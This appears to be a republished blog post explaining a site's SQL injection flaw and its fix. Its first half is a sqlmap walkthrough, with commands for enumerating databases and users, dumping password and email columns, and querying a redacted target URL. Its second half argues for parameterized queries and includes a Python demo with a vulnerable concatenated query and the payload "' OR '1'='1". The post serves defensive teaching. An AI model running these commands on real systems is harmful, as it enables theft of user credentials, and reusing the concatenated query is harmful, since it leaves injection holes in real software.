Analysis and solution of site SQL injection problem

Source: Internet

Author: User

Tags: sql injection, web, database

1. The problem: the site is vulnerable to SQL injection, so an attacker can enumerate the databases, tables, and data it uses.

2. The fix: harden both the front end and the back end, and make every underlying SQL query use parameterized statements.

Injection analysis tool used: sqlmap

Step one: install the sqlmap tool

1. Before installing, set up a Python environment. Installation reference (with instructions): http://blog.csdn.net/baigoocn/article/details/51456721

2. Download the sqlmap toolkit and place its files in a sqlmap directory under the Python installation directory.

Run sqlmap.py -h; if the help information is displayed, the installation succeeded.

3. Common parameters

-u: specify the injection point URL

--dbs (two leading dashes): list all database names

--current-db: the database currently in use by the web application

--current-user: the account the web application uses to access the database

--users: all database users

--passwords: database accounts and passwords

-D tourdata --tables: -D specifies the database name; --tables lists its tables

-D tourdata -T UserB --columns: -D specifies the database name; -T specifies the table; --columns lists its fields

-D tourdata -T userb -C "Email,username,userpassword" --dump: -C specifies the fields to extract; --dump exports the results

--start 1 --stop 10: export a specific range of rows; --start specifies the first row, --stop the last row

(Reference: http://blog.csdn.NET/zgyulongfei/article/details/41017493)

--current-db --current-user


D:\python27\sqlmap>sqlmap.py -u http://xxx.com/cms/xxx_view.aspx?cpn_id=fb509dacdd224a179fde6e71e824ec95 --current-db


--users


-D Fjhba --tables


Further parameters retrieve the remaining information in the same way.

With the operations above, the data can be read out in full, which is extremely dangerous!

String concatenation must never be used when building any SQL statement!


The following way of writing a query carries an injection risk:

select * from TableA where col1 = ' + ColId + ';

Use the parameterized form instead: pass ColId as a bound query parameter rather than splicing it into the SQL text.
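As an added example (not code from the original post), here are the two forms side by side in Python with SQLite. The table TableA, its columns, the sample rows and the hostile input are all constructed for the demonstration; the post's site is ASP.NET, but the distinction between splicing a value into the statement text and binding it as a parameter is the same for any database driver.

```python
import sqlite3

# Constructed sample rows for the demonstration (not data from the original post).
SAMPLE_ROWS = [
    ("c001", "alice@example.com", "alice"),
    ("c002", "bob@example.com", "bob"),
    ("c003", "carol@example.com", "carol"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a hypothetical TableA."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TableA (col1 TEXT, email TEXT, username TEXT)")
    conn.executemany("INSERT INTO TableA VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_concatenated(conn: sqlite3.Connection, col_id: str) -> list:
    """The vulnerable pattern from the post: the caller's value is spliced into the
    SQL text, so whatever it contains becomes part of the statement itself."""
    sql = "SELECT col1, email, username FROM TableA WHERE col1 = '" + col_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, col_id: str) -> list:
    """The parameterized form: the statement is fixed and the value is bound
    separately, so the driver always treats col_id as data, never as SQL."""
    sql = "SELECT col1, email, username FROM TableA WHERE col1 = ?"
    return conn.execute(sql, (col_id,)).fetchall()


def demo() -> dict:
    """Run both forms against a normal id and a constructed hostile input."""
    conn = make_db()
    normal = "c002"
    # Constructed hostile input: closes the string literal and appends an
    # always-true condition, turning a one-row lookup into a full table read.
    hostile = "' OR '1'='1"
    return {
        "concat_normal": lookup_concatenated(conn, normal),
        "concat_hostile": lookup_concatenated(conn, hostile),
        "param_normal": lookup_parameterized(conn, normal),
        "param_hostile": lookup_parameterized(conn, hostile),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) -> {rows}")
```

With concatenation the hostile input returns every row in the table; with the bound parameter the same input simply matches nothing, because the database never interprets it as SQL.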



This article is from the "Frog Qing" blog, please be sure to keep this source http://wuxueqing.blog.51cto.com/13389311/1973704
